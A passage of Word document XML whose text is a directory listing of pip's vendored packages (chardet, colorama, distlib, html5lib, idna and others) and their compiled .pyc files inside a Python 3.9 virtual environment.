    </w:p>
    <w:p w14:paraId="131E3E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codingstatemachine.cpython-39.pyc  hebrewprober.cpython-39.pyc        mbcssm.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53EB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compat.cpython-39.pyc              jisfreq.cpython-39.pyc             sbcharsetprober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F42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cp949prober.cpython-39.pyc         jpcntx.cpython-39.pyc              sbcsgroupprober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9EE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enums.cpython-39.pyc               langbulgarianmodel.cpython-39.pyc  sjisprober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F86E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escprober.cpython-39.pyc           langgreekmodel.cpython-39.pyc      universaldetector.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6774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escsm.cpython-39.pyc               langhebrewmodel.cpython-39.pyc     utf8prober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8ECB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eucjpprober.cpython-39.pyc         langhungarianmodel.cpython-39.pyc  version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759DCED7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42150E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./venv/lib/python3.9/site-packages/pip/_vendor/chardet/cli:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2BE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chardetect.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0FBC5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0127A5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./venv/lib/python3.9/site-packages/pip/_vendor/chardet/cli/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F316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__init__.cpython-39.pyc  chardetect.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1EF62" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553956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./venv/lib/python3.9/site-packages/pip/_vendor/chardet/metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD97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languages.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059839AD" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE950F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./venv/lib/python3.9/site-packages/pip/_vendor/chardet/metadata/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D46A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languages.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFD461" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448392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./venv/lib/python3.9/site-packages/pip/_vendor/colorama:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06969C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ansi.py  ansitowin32.py  initialise.py  win32.py  winterm.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B026A5A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B6F7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./venv/lib/python3.9/site-packages/pip/_vendor/colorama/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443DB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ansitowin32.cpython-39.pyc  win32.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A57F4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ansi.cpython-39.pyc      initialise.cpython-39.pyc   winterm.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F323A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127680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./venv/lib/python3.9/site-packages/pip/_vendor/distlib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67253B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_backport  database.py  locators.py  markers.py   resources.py  util.py     wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A593D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compat.py  index.py     manifest.py  metadata.py  scripts.py    version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9BDDCE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32992A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./venv/lib/python3.9/site-packages/pip/_vendor/distlib/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390F14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index.cpython-39.pyc     markers.cpython-39.pyc    scripts.cpython-39.pyc  wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290F6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compat.cpython-39.pyc    locators.cpython-39.pyc  metadata.cpython-39.pyc   util.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B256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database.cpython-39.pyc  manifest.cpython-39.pyc  resources.cpython-39.pyc  version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E64D17" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352824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./venv/lib/python3.9/site-packages/pip/_vendor/distlib/_backport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFCD9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misc.py  shutil.py  sysconfig.cfg  sysconfig.py  tarfile.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0243F776" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04792BF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./venv/lib/python3.9/site-packages/pip/_vendor/distlib/_backport/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798116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__init__.cpython-39.pyc  misc.cpython-39.pyc  shutil.cpython-39.pyc  sysconfig.cpython-39.pyc  tarfile.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE14EA4" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6192C22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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562ED3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_ihatexml.py     _tokenizer.py  _utils.py     filters         serializer.py  treebuilders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7DF2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_inputstream.py  _trie          constants.py  html5parser.py  treeadapters   treewalkers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6513E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF798C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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AD01A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_inputstream.cpython-39.pyc  _utils.cpython-39.pyc     html5parser.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10254B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_ihatexml.cpython-39.pyc  _tokenizer.cpython-39.pyc    constants.cpython-39.pyc  serializer.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDBE7F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6741B02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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/_trie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FB3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_base.py  py.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7330A0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1D24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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/_trie/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216825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_base.cpython-39.pyc  py.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492C867" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1EE2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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/filters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F25B7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alphabeticalattributes.py  inject_meta_charset.py  optionaltags.py  whitespace.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC48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base.py                    lint.py                 sanitizer.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D5AF6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B474CB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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/filters/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595799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inject_meta_charset.cpython-39.pyc  sanitizer.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1098258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alphabeticalattributes.cpython-39.pyc  lint.cpython-39.pyc                 whitespace.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E370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base.cpython-39.pyc                    optionaltags.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B1F06" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4791E5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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treeadapters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4323DB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genshi.py  sax.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C77A9" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA763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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treeadapters/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029600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__init__.cpython-39.pyc  genshi.cpython-39.pyc  sax.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FF962" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615F07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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EAE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base.py  dom.py  etree.py  etree_lxml.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A6CA53" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AC7F8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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A66D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base.cpython-39.pyc  dom.cpython-39.pyc  etree.cpython-39.pyc  etree_lxml.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC8D423" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367F3F5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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treewalkers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD09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base.py  dom.py  etree.py  etree_lxml.py  genshi.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48BBA2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6053187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./venv/lib/python3.9/site-packages/pip/_vendor/html5lib/treewalkers/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE1B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dom.cpython-39.pyc    etree_lxml.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DEF10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base.cpython-39.pyc      etree.cpython-39.pyc  genshi.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D279EE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9C831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./venv/lib/python3.9/site-packages/pip/_vendor/idna:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EDFB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codec.py  compat.py  core.py  idnadata.py  intranges.py  package_data.py  uts46data.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8D303" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F83CCA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./venv/lib/python3.9/site-packages/pip/_vendor/idna/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F86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compat.cpython-39.pyc  idnadata.cpython-39.pyc   package_data.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF70A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codec.cpython-39.pyc     core.cpython-39.pyc    intranges.cpython-39.pyc  uts46data.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E84BE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5247346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./venv/lib/python3.9/site-packages/pip/_vendor/msgpack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B33DC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_version.py  exceptions.py  ext.py  fallback.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755984A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C034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./venv/lib/python3.9/site-packages/pip/_vendor/msgpack/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D991F5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_version.cpython-39.pyc  exceptions.cpython-39.pyc  ext.cpython-39.pyc  fallback.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1654909F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453CDD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./venv/lib/python3.9/site-packages/pip/_vendor/packaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17057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__about__.py  __pycache__    _musllinux.py   markers.py       specifiers.py  utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38FB2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_manylinux.py  _structures.py  requirements.py  tags.py        version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07A9A3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27039A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./venv/lib/python3.9/site-packages/pip/_vendor/packaging/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D043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__about__.cpython-39.pyc   _musllinux.cpython-39.pyc   requirements.cpython-39.pyc  utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78AAC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_structures.cpython-39.pyc  specifiers.cpython-39.pyc    version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D19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_manylinux.cpython-39.pyc  markers.cpython-39.pyc      tags.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D97FF" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328CEF6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./venv/lib/python3.9/site-packages/pip/_vendor/pep517:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7F24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build.py  colorlog.py  dirtools.py  in_process  wrappers.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A603F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check.py  compat.py    envbuild.py  meta.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F36F86" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0A627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./venv/lib/python3.9/site-packages/pip/_vendor/pep517/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271241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check.cpython-39.pyc     compat.cpython-39.pyc    envbuild.cpython-39.pyc  wrappers.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29822F3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build.cpython-39.pyc     colorlog.cpython-39.pyc  dirtools.cpython-39.pyc  meta.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259446B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A279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./venv/lib/python3.9/site-packages/pip/_vendor/pep517/in_process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352147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_in_process.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2D932" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE346C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./venv/lib/python3.9/site-packages/pip/_vendor/pep517/in_process/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F24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_in_process.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9EA0C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F24AA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./venv/lib/python3.9/site-packages/pip/_vendor/pkg_resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8DA7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py31compat.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D142BE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFA72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./venv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C4A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py31compat.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A06829" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC8B40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./venv/lib/python3.9/site-packages/pip/_vendor/platformdirs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE4C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__main__.py  __pycache__  android.py  api.py  macos.py  unix.py  version.py  windows.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1F9D2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C9AA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./venv/lib/python3.9/site-packages/pip/_vendor/platformdirs/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1DFE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android.cpython-39.pyc  macos.cpython-39.pyc  version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
